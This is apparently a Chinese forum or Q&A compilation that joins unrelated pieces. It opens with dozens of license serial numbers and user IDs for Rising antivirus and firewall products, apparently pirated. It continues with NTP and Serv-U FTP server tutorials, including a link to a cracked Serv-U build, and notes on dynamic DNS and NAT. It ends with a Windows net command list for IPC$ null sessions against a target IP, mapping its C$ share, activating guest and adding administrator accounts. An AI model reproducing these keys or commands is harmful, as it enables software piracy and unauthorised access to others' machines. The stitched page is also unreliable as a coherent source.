W13KIE-NP8U4J-LV82S3-VH6800 52LDJG-Q9LBCT-6ACQS2-R30400
52LDJG-Q9LBCT-6ACQS2-R39600 W13KIE-NP8U4J-LV82S3-VH0990
U0I26A-W84GHI-NR8KSB-SU4300 W13KIE-NP8U4J-LV82S3-VH1690
W13KIE-NP8U4J-LV82S3-VH1190 W13KIE-NP8U4J-LV82S3-VH7900

ID:RCEXBH76 RCEXARP9 RCVUALMS RCHVH5CV

--------------------更多瑞星2005杀毒网络版安装序列号-------------------
3PVQNT-5JP184-9R8IJB-1F9108
WS1H3W-WUWUU9-JL1D3Q-SF9108
86CEWS-WR44SP-6DGDR4-DAF008
WS1H3W-PLWUU9-JL1D3Q-SF9108
WS1H3W-wuWUU9-JL1D3Q-SF9108
2RE9VM-WUC1QA-51MA0T-DR9108
P28FLA-L0VCQL-BB8NM7-HJA108
-----------------------瑞星个人防火墙 2005版序列号---------------------
SN:36RDFV-PQMJ3W-M65EGV-RN4200 ID: 任意

瑞星个人防火墙下载版
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
升级ID:RCX89JYL
序列号77PUHE-QPV6KB-ME6JS3-KM5200 ID(任意)
序列号:LT4FC3-UF13S0-WBMMS1-U9D200
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
ID:RCESAUW4
ID:F1CMIFNA

瑞星2006下载版 三年升级充列号
杀毒软件2006 安装序列号及用户ID
序列号: E71DBM-SQPAIU-MT06S5-QID200
用户ID: 4HAWMLBCR24J

瑞星2005序列号及ID
52LDJG-Q9LBCT-6ACQS2-R35200
ID:4AJRY64DNA4GSvM+T
U0I26A-W84GHI-NR8KSB-SU9600 ID:RCVUL38G
52LDJG-Q9LBCT-6ACQS2-R30500 ID:RCEXBGXF
U0I26A-W84GHI-NR8KSB-SU2700 ID:RCHVHSD5
0HM282-5BC8d3-U5MMd1-I20000 ID:RBFJDE8H
RIUEKR-EKNBL6-JLE9S0-9QD200 ID:TA26GFH8
36RDFV-PQMJ3W-M65EGV-RN4200 ID:4AJRY64DNA4G
LKFN4I-U83T14-NB3ARN-13D200 ID:4H9T4551XB4G
WIFBQF-WTJRVB-WWD0SQ-D05200 ID:4AN34IEGRA4A
瑞星个人防火墙下载版
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
升级ID:RCX89JYL
序列号77PUHE-QPV6KB-ME6JS3-KM5200 ID(任意)
序列号:LT4FC3-UF13S0-WBMMS1-U9D200
序列号:9G9V0Q-A92E86-AJCTRN-9RD200
ID:RCESAUW4
ID:F1CMIFNA

瑞星正版终身升级CD-KEY
CD-KEY: RCQJ1KBI

正版瑞星序列号和ID
RCESAUW4
HNTQPT-4AWW67-13718L-HC4200

F1CMIFNA
RIUEKR-EKNBL6-J5E9XX-9QDI04

SBS55XYP
RIUEKR-EKNBL6-I5E9MG-9QDZ04

SB71SQ6W
05VU71-04FE9P-802MRU-DQ5200

RCESC6KG
W13KIE-NP8U4J-LV82S3-VH1192

SBQMACN9
52LDJG-Q9LBCT-6ACQ52-R35200

OBZ6UBUA
52LDJG-Q9LBCT-7ACQS2-R38300

RCHVABRE
RIUEKR-EKNBL6-JLE9TO-9QDZ04

CA2MSL8Q
W13KIE-NP8U4J-LV82S3-VH1192

RCHVBBP1
U0I26A-W84GHI-NR8KSB-SU9500

K1JYINE8
W13KIE-NP8U4J-LV82S3-VH6990

注册码:WIFBQF-WTJRVB-WWD0SQ-D05200
ID:4AN34IEGRA4A

8KVCFE-I57J3S-KH6SRV-B2D200
6A7WQ3FAXE41

序列号:RIUEKR-EKNBL6-JLE950-9QD200
用户ID:4AJRY64DNA4G

SN:R240UA-VGH07A-NK9RS3-IPD200 ID:5ASYTCUYCC4I
SN:JQ1UBP-TV8FAV-77V4S9-9VD200 ID:5AT4S856SB4N
SN:7IM2QA-1TLGMA-GFEHSJ-N4D200 ID:5AT694E3TB43
SN:N345K2-UPQ1D0-NEC1S4-QD5200 ID:4AGLVH3WKA4N
SN:8PD2IH-I638KK-CHRC88-565200 ID:4AWKZ3DXNA4P
SN:SI7BTD-MTHRW3-DN8KS7-0FD200 ID:5A15ETA2DC4L
SN:0R3FW0-P6GSWP-61QKS4-S3D200 ID:5A2D8VZYDC46
SN:585SIB-9A1ETI-RASMSD-AVD200 ID:5A2WWT1GMB4L
SN:JALI7T-4RLCHW-16VNS5-42D200 ID:5A4A1VZHWB4M
SN:RHNF85-EKDSR1-BLERS8-7MD200 ID:5A79JL39YC4Q
SN:MBTERL-UIW3ML-FCRIS3-H5D200 ID:5ALDJIMNIC4X
SN:KRAHNU-56IKDW-99W9S1-1AD200 ID:5AQ5XDZH9B4X
SN:4HA31G-H4AGPC-49F7SF-4CD200 ID:5AQA559VGC48
SN:M3RSQJ-DGVMVC-SCC9SP-QCD200 ID:5AS3RE9GCB48
SN:19G0BS-PAC02V-V2VLSB-F6D200 ID:5AS3YB5TTC4J
SN:J1BG47-CPAT11-S69AS2-UFD200 ID:5AWP5MCG5B4B
SN:F32H9G-JPPKAC-4VDVSS-6TD200 ID:5AQMP82IDB4Z
SN:TJ1A8E-F4PAI3-JQBGSA-BKD200 ID:5AKRZATXWC4F

[分享]瑞星通用序列号

瑞星产品通用
PHHL6F-M4CD9J-UH9PSF-WL5200
4AZD7514214W

Ⅲ NTP服务器未联网,怎么配置

二、配置ntp服务器端
restrict 0.0.0.0 mask 0.0.0.0 nomodify notrap noquery

restrict 192.168.166.0 mask 255.255.255.0 nomodify

restrict 127.0.0.1

server 210.72.145.44 prefer

server 127.127.1.0

fudge 127.127.1.0 stratum 8

driftfile /var/lib/ntp/drift

keys /etc/ntp/keys

说明:关于权限设定部分
权限的设定主要以 restrict 这个参数来设定,主要的语法为:
restrict IP地址 mask 子网掩码 参数
其中 IP 可以是IP地址,也可以是 default ,default 就是指所有的IP
参数有以下几个:
ignore:关闭所有的 NTP 联机服务
nomodify:客户端不能更改服务端的时间参数,但是客户端可以通过服务端进行网络校时。
notrust :客户端除非通过认证,否则该客户端来源将被视为不信任子网
noquery :不提供客户端的时间查询
注意:如果参数没有设定,那就表示该 IP (或子网)没有任何限制!

三、查看NTP服务的运行状况
#watch ntpq -p

参数说明:
remote: 它指的就是本地机器所连接的远程NTP服务器
refid: 它指的是给远程服务器(e.g. 193.60.199.75)提供时间同步的服务器
st: 远程服务器的层级别(stratum). 由于NTP是层型结构,有顶端的服务器,多层的Relay Server再到客户端. 所以服务器从高到低级别可以设定为1-16. 为了减缓负荷和网络堵塞,原则上应该避免直接连接到级别为1的服务器的.
t: 这个.....我也不知道啥意思^_^
when: 我个人把它理解为一个计时器用来告诉我们还有多久本地机器就需要和远程服务器进行一次时间同步
poll: 本地机和远程服务器多少时间进行一次同步(单位为秒). 在一开始运行NTP的时候这个poll值会比较小,那样和服务器同步的频率也就增加了,可以尽快调整到正确的时间范围.之后poll值会逐渐增大,同步的频率也就会相应减小
reach: 这是一个八进制值,用来测试能否和服务器连接.每成功连接一次它的值就会增加
delay: 从本地机发送同步要求到服务器的round trip time
offset: 这是个最关键的值, 它告诉了我们本地机和服务器之间的时间差别. offset越接近于0,我们就和服务器的时间越接近
jitter: 这是一个用来做统计的值. 它统计了在特定个连续的连接数里offset的分布情况. 简单地说这个数值的绝对值越小我们和服务器的时间就越精确

四、客户端配置
ntpdate 192.168.166.100
LINUX做为客户端自动同步时间
如果想定时进行时间校准,可以使用crond服务来定时执行。
编辑 /etc/crontab 文件
加入下面一行:
30 8 * * * root /usr/sbin/ntpdate 192.168.166.100; /sbin/hwclock -w #192.168.0.1是NTP服务器的IP地址
然后重启crond服务
service crond restart
这样,每天 8:30 Linux 系统就会自动的进行网络时间校准。
WINDOWS 需要打开windows time服务和RPC的二个服务
如果在打开windows time 服务,时报 错误1058,进行下面操作
1.运行 cmd 进入命令行,然后键入
w32tm /register 进行注册
正确的响应为:W32Time 成功注册。
2.如果上一步正确,用 net start "windows time" 或 net start w32time 启动服务。

五、报错说明
当用ntpdate -d 来查询时会发现导致 no server suitable for synchronization found 的错误的信息有以下2个:

错误1.Server dropped: Strata too high
在ntp客户端运行ntpdate serverIP,出现no server suitable for synchronization found的错误。
在ntp客户端用ntpdate –d serverIP查看,发现有“Server dropped: strata too high”的错误,并且显示“stratum 16”。而正常情况下stratum这个值得范围是“0~15”。
这是因为NTP server还没有和其自身或者它的server同步上。
以下的定义是让NTP Server和其自身保持同步,如果在/ntp.conf中定义的server都不可用时,将使用local时间作为ntp服务提供给ntp客户端。
server 127.127.1.0 fudge

127.127.1.0 stratum 8

在ntp server上重新启动ntp服务后,ntp server自身或者与其server的同步的需要一个时间段,这个过程可能是5分钟,在这个时间之内在客户端运行ntpdate命令时会产生no server suitable for synchronization found的错误。
那么如何知道何时ntp server完成了和自身同步的过程呢?
在ntp server上使用命令:

# watch ntpq -p

出现画面:

Every 2.0s: ntpq -p Thu Jul 10 02:28:32 2008
remote refid st t when poll reach delay offset jitter
==============================================================================
192.168.30.22 LOCAL(0) 8 u 22 64 1 2.113 179133. 0.001
LOCAL(0) LOCAL(0) 10 l 21 64 1 0.000 0.000 0.001

注意LOCAL的这个就是与自身同步的ntp server。
注意reach这个值,在启动ntp server服务后,这个值就从0开始不断增加,当增加到17的时候,从0到17是5次的变更,每一次是poll的值的秒数,是64秒*5=320秒的时间。
如果之后从ntp客户端同步ntp server还失败的话,用ntpdate –d来查询详细错误信息,再做判断。

错误2.Server dropped: no data
从客户端执行netdate –d时有错误信息如下:
transmit(192.168.30.22)
transmit(192.168.30.22)
transmit(192.168.30.22)
transmit(192.168.30.22)
transmit(192.168.30.22)
192.168.30.22: Server dropped: no data
server 192.168.30.22, port 123
.....
28 Jul 17:42:24 ntpdate[14148]: no server suitable for synchronization found
出现这个问题的原因可能有2:

1.检查ntp的版本,如果你使用的是ntp4.2(包括4.2)之后的版本,在restrict的定义中使用了notrust的话,会导致以上错误。
使用以下命令检查ntp的版本:
# ntpq -c version

下面是来自ntp官方网站的说明:
The behavior of notrust changed between versions 4.1 and 4.2.
In 4.1 (and earlier) notrust meant "Don't trust this host/subnet for time".
In 4.2 (and later) notrust means "Ignore all NTP packets that are not cryptographically authenticated." This forces remote time servers to authenticate themselves to your (client) ntpd
解决:
把notrust去掉。

2.检查ntp server的防火墙。可能是server的防火墙屏蔽了upd 123端口。
可以用命令
#iptables INPUT -p udp -m udp --dport 123 -j ACCEPT
如果觉得麻烦就直接把防火墙停掉
#service iptables stop

来关掉iptables服务后再尝试从ntp客户端的同步,如果成功,证明是防火墙的问题,需要更改iptables的设置。

Ⅳ 局域网内架设网站(高手请进)

【怎样建立个人FTP】

Serv-U FTP Server 5.0.0.11 final 特别破解版汉化版
点击下载

《FTP Serv-U 教程》+《FTP的建立和维护手册》
点击下载

在网上做过软件下载的人都知道,建立一个FTP下载服务器相对比较简单,一般用WIN2000下自带的IIS就可以,但IIS在功能上好多都不尽人如意,下面我就介绍一款功能非常强大,但使用简单的FTP服务器构建软件-Serv-U FTP Server,让我们也来体验一下自己DIY FTP服务器的快乐! 在说明使用之前,让我先大致介绍一下Serv-U(本文中提到Serv-U版本为3.0.0.17), Serv-U 是一个可以运行于Windows 95/98/2000/ME 和 Windows NT 4.0下的FTP服务器程序如图所示,

有了它,你的个人电脑就可以模拟为一个FTP服务器,也就是说,你所连接的网络中的计算机用户可以访问你的个人电脑,通过FTP协议(文件传输协议)复制、移动、删除你的电脑中的文件或文件夹,可以做一切权限所允许的事情。FTP协议规定了计算机之间的标准通讯方式,使所有不同类型,不同操作系统,不同格式的电脑之间得以互换文件。它可以用最简单的方式创建用户帐号,并且在硬盘空间上划分一定的区域用以存放文件,让用户以各种FTP客户端软件(如CuteFTP、WS_FTP等)上传或下载所需要的文件。

有许多FTP服务器和客户端软件可用于不同的系统中,Serv-U是用于运行MS-Windows 并且已安装了WinSock 版本 1.1 兼容 TCP/IP协议的个人电脑中的,这几乎包括了所有的Windows操作系统。

Serv-U由两大部分组成,引擎和用户界面。Serv-U引擎(ServUDaemon.exe)其实是一个常驻后台的程序,也是Serv-U整个软件的心脏部分,它负责处理来自各种FTP客户端软件的FTP命令,也是负责执行各种文件传送的软件。在运行Serv-U引擎也就ServUDaemon.exe
文件后,我们看不到任何的用户界面,它只是在后台运行,通常我们无法影响它,但在ServUAdmin.exe中我们可以停止和开始它。Serv-U引擎可以在任何Windows平台下作为一个本地系统服务来运行,系统服务随操作系统的启动而开始运行,而后我们就可以运行用户界面程序了。在Win NT/2000系统中,Serv-U会自动安装为一个系统服务,但在Win 9x/Me中,你需要在“服务器”面板中选择“自动开始”,才能让它转为系统服务。Serv-U用户界面(ServUAdmin.exe)也就是Serv-U管理员,它负责与Serv-U引擎之间的交互。它可以让用户配置 Serv-U,包括创建域、定义用户、并告诉服务器是否可以访问。启动Serv-U管理员最简单的办法就是直接点接系统栏的“U”形图标,当然,你也可以从开始菜单中运行它。

在此有必要把Serv-U中的一些重要的概念给大家讲清楚:每个正在运行的Serv-U引擎可以被用来运行多个“虚拟”的FTP服务器,在管理员程序中,每个“虚拟”的FTP服务器都称为“域”,因此,对于服务器来说,不得不建立多个域时是非常有用的。每个域都有各自
的“用户”、“组”和设置。一般说来,“设置向导”会在你第一次运行应用程序时设置好一个最初的域和用户帐号。服务器、域和用户之间的关系大家可以参考下表:
*Serv-U 服务器
*域 1
*用户帐号 1
*用户帐号 2
*用户帐号 3
*域 2
*用户帐号 1
*用户帐号 2
*域 3
*用户帐号 1
*用户帐号 1

这个表有点类似与Serv-U管理员中服务器、域和用户的排列。

Serv-U FTP Server 是试用软件,安装后三十天内,你可以作为“专业版本”使它,但试用期过后,你就只能作为免费的“个人版
本”使用了,只有基本功能了。

好了,说了这么多,还没到关键部分-如何自己来建立FTP服务器。下面我就一步一步来说明。
一、 安装原版软件和汉化补丁,这个过程就不多说了,想必没人不会的。
二、 建立第一个本地FTP服务器
安装完成后程序会自动运行,你也可以在菜单中选择运行。
1、 第一次运行程序,它会弹出设置向导窗口如图,

将会带你完成最初的设置,
2、 单击“下一步”,出现“显示菜单图像”的窗口,问你是否在菜单中显示小图像,看各人喜欢了;
3、 单击“下一步”,这个窗口是让你在本地第一次运行FTP服务器,只要“下一步”就行了。
4、 接下来要你输入你的IP地址如图,

如果你自己有服务器,有固定的IP,那就请输入IP地址,如果你只是在自己电脑上建立FTP,而且又是拨号用户,有的只是动态IP,没有固定IP,那这一步就省了,什么也不要填,Serv-U 会自动确定你的IP地址,“下一步”;
5、 在这儿要你输入你的域名,如图

如果你有的话,如:ftp.abc.com,没有的话,就随便填一个;
6、 “下一步”,询问你是否允许匿名访问如图

一般说来,匿名访问是以Anonymous为用户名称登录的,无需密码,当然如果你想成立一个会员区什么的,就应该选择“否”,不让随便什么人都可以登录,只有许可用户才行,在此我们填“是”;
7、 “下一步”,问你匿名用户登录到你的电脑时的目录,如图,

你可以自己指定一个硬盘上已存在的目录,如F:\temp\xyz;
8、 “下一步”,询问你是否要锁定该目录,锁定后,匿名登录的用户将只能认为你所指定的目录(F:\temp\xyz)是根目录,也就是说他只能访问这个目录下的文件和文件夹,这个目录之外就不能访问,对于匿名用户一般填“是”;
9、 “下一步”,询问你是否创建命名的帐号,也就是说可以指定用户以特定的帐号访问你的FTP,这对于办会员区可很有用哦,你可以对于每个人都创建一个帐号,每个帐号的权限不同,就可以不同程序地限制每个人的权利,方法将在后面讲到,这里选择“是”;
10、 “下一步”,请你填入所要建立的帐号的名称,如图,如:ldr,

11、 “下一步”,请输入密码,如:123,
12、 “下一步”,询问登录目录是什么,这一步与第7步一样,如:F:\temp
13、 “下一步”,询问你是否要锁定该目录,同第8步,这里选择“否”;
14、 接下来询问你这次创建的用户的管理员权限,如图,

有几项选择:无权限,组管理员,域管理员,只读管理员和系统管理员,每项的权限各不相同;这里选择“系统管理员”;
15、 最后一步,点击“完成”就OK了,你有什么需要修改的,可以点“上一步”,或者进入Serv-U管理员直接修改。至此,我们建立
了一个域ftp.abc.com,两个用户,一个Anonymous,一个ldr。

三、 既然我们已经建立好FTP服务器,那么我们就应该可以用FTP客户端软件来尝试登录。
怎么办呢?其实很简单,我们不用上网,就可以测试。我们知道,不上网时,本地机的IP地址默认就为127.0.0.1,FTP端口号为21。打开FTP客户端软件,我就用FlashFXP来说明,打开快速连接,填入相应内容,如图

然后连接,如图

可以看到,我左边窗格以Anonymous登录,右边窗格以ldr登录,由于是本地机,所以速度奇快,上网后,假如我要让你登录到我的电脑上,我只要把我的上网时的IP地址给你,你就可以匿名访问我的电脑了(注意不要开防火墙),是不是很方便?

四、Serv-U管理员中的各项设置
在设置完成后,将会进入Serv-U管理员的主界面,如图

左边窗格中显示各个栏目,右边窗格中显示各个栏目的具体选项,下面就大概讲一讲设置内容。
1、 在图中,我们可以人为地控制Serv-U引擎的运行或停止,记住,在Win 9x/Me 中,我们就要在此选择“系统服务”,才会运行
Serv-U引擎。
2、 “许可”,如果你花美元买了注册号,就可以在此输入。
3、 “设置”,这个设置是对于“本地服务器”来说的。“常规”设置中,如图

可以限制服务器的最大速度,可以拦截FXP(站点到站点传送),也可以限制用户的数量,这样不至于你的服务器被拖跨。“目录缓存”设置中,如图

允许你自己确定目录列表的个数以及超时时间,在Windows 95 和 NT下,目录列表默认设置为25,当缓存满了之后,新的请求将替换老的请求。“高级”设置中,如图

可以让你自己定义服务器、Socket、文件的上传和下载的各项设置。
4、 “活动”,在这里记录了用户的活动日志,已封锁的IP的活动日志,以及任务日志;任务日志中显示的就是你开始停止的各项操作记录,你可以点击右击,选择一此过滤文本,使其只显示你所想见的内容,如图

5、 “域”,这里包含了你一开始根据向导所建立的用户、设置、域等。“域--设置”中所设置的内容其实与第3步差不多,只是它更
加具体,可以对于每一个不同域定制。“域--活动”中记载了这个域下所有用户的活动情况。
6、 “域--组”,我们可以自己建立一些便于管理的组,然后把一类的用户归到一个组中。
7、 “域--用户”中,大家可以看到一开始我们建立的两个帐号,一个Anonymous,一个ldr。现在就帐号ldr来对其中的细节设置说明一下。
A、“帐号”栏,如图

对于一些不守规则的人,我们可以选择“禁用帐号”,虽然有帐号,但可以使用户一时间无法登录;你也可以设置让程序到达某个日期后自动删除某个帐号;下面几栏是这个帐号的基本信息,我们都可以在此更改,其中密码改过后并不显示,而是统一显示<>,特别要注意选项“锁定用户于主目录”,什么意思呢?大家应该碰到,每次我们登录到FTP服务器上后,在根目录下只显示“/”,选择这项选项后,就是这样,如果不选,会出现什么情况呢?你可以做一下试验,在根目录下将显示“/f:/temp/”,也就是说显示了你硬盘中的绝对
地址,这在某些情况下是很危险的,有不怀好意的高手,你就麻烦了!

你可以隐藏属性为隐藏的文件,可以限制同一IP的登录个数,是否允许用户更改密码(这需要客户端软件的支持),最大上传下载的速
度,超时时间以及空闲时间,你也可以限制最大用户数量,如20,说明同时只能有20个用户登录。
C、“目录访问”栏,如图

在此你可以控制用户对于文件目录的权限,对文件有读取、写入、删除、追加、执行等操作,对于文件夹有列表、创建、删除,以及是否继承子目录;如果觉得目录不够,你也可以添加可访问的目录。
D、“IP访问”栏,如图

在这里你可以规定某个IP是否可以访问你的FTP服务器,你可以拒绝它的访问,只要填上相应的IP地址,以后由这个IP的访问通通被拦下。
E、“上传/下载率”栏,如图

在这里你可以设置上传和下载之间的比值,控制好上传和下载之间的数据流量关系。
F、“配额”栏,如图

这里你可以为每个FTP用户设置磁盘空间,点击“计算当前”,可以知道当前目前下的所有空间大小,在“最大”一栏中填入你想要限制的容量。

最后有一点,改过设置后一定要点击右键,选择“应用”使设置生效才行,否则一切都白做了!!
希望大家学会后,能为更多的人提供下载,享受宽带带来的快乐!

==========================================================================================================

SERV-U FTP的欢迎词设置
让你的SERV-U FTP看起来更专业一点
现在很多的朋友都用SERV-U做个人FTP的服务器,有关如何使用SERV-U架设服务器的文章很多了,这儿我就不多说了。不过大家不知道注意到了没有,当你登陆很多FTP的时候,会显示一些欢迎信息,比如说显示你的IP,告诉你目前有多少人在使用FTP,带宽是多少等等。。。看起来就比较的专业样子。其实你自己也是可以做的,SERV-U这个软件本身就有这个功能。下面我就说明以下如何在自己的FTP里面加上这些信息。

第一、先建立一个文本文件,随便取一个名字。我们这儿就取message.txt吧。

第二、这个这个文本文件里面加上这些文字

-----------------------------------
欢迎来到XXX的个人FTP服务器
你的IP地址是:%IP
目前服务器所在的时间是 %time
已经有 %u24h 个用户在最近24小时访问过本FTP
本FTP服务器已经运行了 %ServerDays 天,%ServerHours 小时 和 %ServerMins 分。

服务器的运行情况:

所有登陆用户数量: %loggedInAll total
当前登陆用户数量: %Unow
已经下载字节数: %ServerKbDown Kb
已经上传字节数: %ServerKbUp Kb
已经下载文件数: %ServerFilesDown
已经上传文件数: %ServerFilesUp
服务器平均带宽: %ServerAvg Kb/sec
服务器当前带宽: %ServerKBps Kb/sec
------------------------------------

其中XXX可以改成你的名字

你也可以加上一些你自己认为喜欢的文字,不过要注意的是每行最好不要超过80个字符

其中以%开头的都是一些变量,下面是SERV-U能支持的变量

时间和日期

%Time - 显示你的计算机当前时间
%Date - 显示你的计算机当前日期

服务器的统计信息

%ServerDays - 显示服务器已经运行的天数
%ServerHours - 显示服务器已经运行的小时数
%ServerMins - 显示服务器已经运行的分钟数
%ServerSecs - 显示服务器已经运行的秒数
%ServerKbUp - 显示自从服务器运行以来已经上传的字节数
%ServerKbDown - 显示自从服务器运行以来已经下载的字节数
%ServerFilesUp - 显示自从服务器运行以来已经上传的文件数
%ServerFilesDown - 显示自从服务器运行以来已经下载的文件数
%LoggedInAll - 显示自从服务器运行以来已经登陆的用户数
%ServerAvg - 显示服务器的平均带宽
%ServerKBps - 显示服务器的当前带宽

服务器的设定信息

%MaxUsers - 显示服务器能同时登陆的最大用户数量
%MaxAnonymous - 显示服务器能同时登陆的最大匿名用户数量

用户信息

%Name - 显示登陆的用户名
%IP - 显示登陆的用户IP地址
%Dir - 显示登陆的用户的当前目录
%Disk - 显示登陆的用户的当前磁盘
%DFree - 显示登陆的用户的当前磁盘空间,单位是MB
%FUp - 显示登陆的用户上传的文件数量
%FDown - 显示登陆的用户下载的文件数量
%FTot - 显示登陆的用户上传和下载的总的文件数量
%BUp - 显示登陆的用户上传的字节数,单位是KB
%Bdown - 显示登陆的用户下载的字节数,单位是KB
%BTot - 显示登陆的用户上传和下载的总字节数,单位是KB
%TconM - 显示登陆用户连接时间,单位是分钟
%TconS - 显示登陆用户连接时间,单位是秒,要和%TconM一起使用
%RatioUp - 显示登陆用户的上传流量限制
%RatioDown - 显示登陆用户的下载流量限制
%RatioCredit - 显示登陆用户还有多少credit可以上传和下载,这个是针对有些FTP是要上传多少文件,才能下载多少文件而设置的
%QuotaUsed - 显示登陆用户的已经使用了多少空间,单位是KB
%QuotaLeft - 显示登陆用户的还有多少空间可以使用,单位是KB
%QuotaMax - 显示登陆用户的的最大空间,单位是KB
后面3个是针对有磁盘限制的用户设置的

用户数量

%UNow - 显示当前有多少用户连接
%UAll - 显示从服务器运行以来一共有多少用户连接过
%U24h - 显示最近24小时有多少用户
%UAnonAll - 显示当前总的匿名用户数量
%UAnonThisIP - 显示所有匿名登陆的用户数
%UNonAnonAll - 显示所有当前非匿名登陆用户数
%UNonAnonThisIP - 显示所有非匿名登陆用户数
%UThisName - 显示所有使用这个名字登陆的用户数

自己在先建立一个.txt文件,输入你想要显示的文字,具体参数看上面的内容,然后在Serv_u内的server设置里面,加入这个.txt文件就可以了

==========================================================================================================

——常见FTP登陆Log信息——
常见FTP登陆Log信息

1.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER anonymous
530 Sorry, no ANONYMOUS access allowed.
QUIT
这个就是不许匿名登录啦

2.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER test
331 User name okay, need password.
PASS xxxxxx
530 Not logged in.
QUIT
一般是密码输入错误时出现的信息,但对于Serv-U来说,如果没有这个帐号(test)存在,也会产生同样的出错信息。

3.
Connecting to xxx.xxx.xxx.xxx, Port 21 (#1)
ERROR: Connection timed out
这个表明对方未开机,也可能是对方不在你能访问的范围内

4.
Connecting to xxx.xxx.xxx.xxx Port 21 (#1)
ERROR: Connection refused
这个一般表明对方已开机,但未开启FTP服务(没有开Serv-U)
也可能为对方不提供在这个端口上的服务

5.
Connecting to xxx.xxx.xxx.xxx, Port 21 (#1)
Connected. Waiting for response.
Disconnected from server.
Connection attempt failed. Waiting for retry...
出现这个信息实在是很倒霉,你极有可能被对方Ban了。
如果只是Ban几分钟or几小时or一天还好,不然只有和站长说说好话,让他给你解封吧。

6.
Connecting to xxx.xxx.xxx.xxx, Port 21 (#1)
Connected. Waiting for response.
USER XXX
331 User name okay, need password
PASS xxxxxx
530 Not logged in, unauthorized IP address.
QUIT
这个有点麻烦,你的IP不在站长允许访问的IP范围内,只有和站长联系,让他把你的IP网段加入Allow Access列表里吧

7.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER user
421 Too many users - please try again later.
哈哈,这个很常见吧,用户太多

8.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER test
530 Not logged in, only one session from same IP allowed at a time.
QUIT
每个IP只能开一个下载,就不要用多线程啦,小心Ban了你。

----------------------------------------------------------------------------------------------

内网、局域网如何设置IP,建立FTP
首先,我们知道动态IP机器出去的最大问题是IP,因为动态IP机器的IP外网是无法识别的,我们讨论的是最普通的局域网内工作站出去做FTP和WEB站点的问题!
动态域名解析正好能够解决此类问题,它的原理是将本机的动态IP自动映射到预先申请好的虚拟域名上,这样外面就可以通过访问固定的虚拟域名来访问到动态IP机器了。
<花生壳>该软件使用方便,几乎不用动什么脑筋,唯一要做的事情就是去注册,然后申请一个以vicp.net为后缀虚拟域名。
1.进入http://www.oray.net/,下载<花生壳>,并“注册网域护照”!
2.注册完成后,登陆“我的控制台”

3.进入“我的控制台”,点击左下角的‘我要.激活花生壳服务’

4.点击“开始”进入

在‘免费域名’填入不重复的你想要得名字就是你将来的域名,例如:AGHU

5.以后就是“服务条款”和“填写站点信息”,这些地球人都知道怎么填!
填完结束,恭喜你,你的域名已经有了!例如:你以后的域名就是AGHU.VICP.NET
申请完免费域名以后,就安装你已经下载的<花生壳>,然后打开运行

输入你的注册名和密码,等一下就会激活你的域名,兴奋吧!
然后你的ftp和web就可以启动咯!
架设ftp服务器的事情,另外有帖子详细介绍了!!
======================================
局域网内公开的ip只有一个,除非你是在主机上建私服,否则你无法公开你的私服,只能在局域网内,解决的办法如下。
由于公网ip地址有限,不少isp都采用多个内网用户通过代理和网关路由共用一个公网ip上internet的方法,这样就限制了这些用户在自己计算机上架设个人网站。要实现对我们来说是比较困难的,首先得得到系统管理员的支持才能够实现。因为这一切的设置必须在代理服务器上做的。要实现这一点,可以用windows 2000 服务者 的端口映射功能,除此之外winroute pro也具有这样的功能,还有各种企业级的防火墙。而对于我们这些普通用户,恐怕还是用windows 2000 的转换以解决ip地址匮乏问题。在防火墙上实现nat后,可以隐藏受保护网络的内部拓扑结构,在一定程度上提高网络的安全性。如果反向nat提供动态网络地址及端口转换功能,还可以实现负载均衡等功能端口映射功能可以让内部网络中某台机器对外部提供www服务。 端口映射功能还可以完成一些特定代理功能,比如代理pop,smtp,telnet等协议。理论上可以提供六万多个端口的映射,恐怕我们永远都用不完的。

一、下面来介绍一下通过nat共享上网和利用nat来实现端口映射。

1、在windows 2000 server上,从管理工具中进入“路由和远程访问”(routing 并且 遥远 access)服务,在服务器上鼠标右击,-》“配置并启用路由和远程访问”

2、点“下一步”

3、选“internet连接服务器”,让内网主机可以通过这台服务器访问internet.(最好先配置好nat共享,让内网主机可以正常上网,不然的话,配好端口映射后再来配置nat共享就有点麻烦了,弄的不好nat还共享不了。)

4、选“设置有网络地址转换(nat)路由协议的路由器”,不要选“设置internet连接共享(ics)”.(ics与nat的区别在于使用的容易程度上,为了启用ics,只需要选择一个复选框就可以了,而为了启用nat,则需要更多的配置任务,此外,ics用于小型网络上的原因还在于:针对内部主机,它需要有一个固定的ip地址范围;针对与外部网络的通信,它被限制在单个公共ip地址上;它只允许单个内部网络接口。)

后面还有写不下了
自己看吧:http://www.1cfc.com/newbbs/archive/topic/220653-1.html
参考资料:http://www.1cfc.com/newbbs/archive/topic/220653-1.html

Ⅳ 网络连接的问题

DOS命令字典..收藏
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schele)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
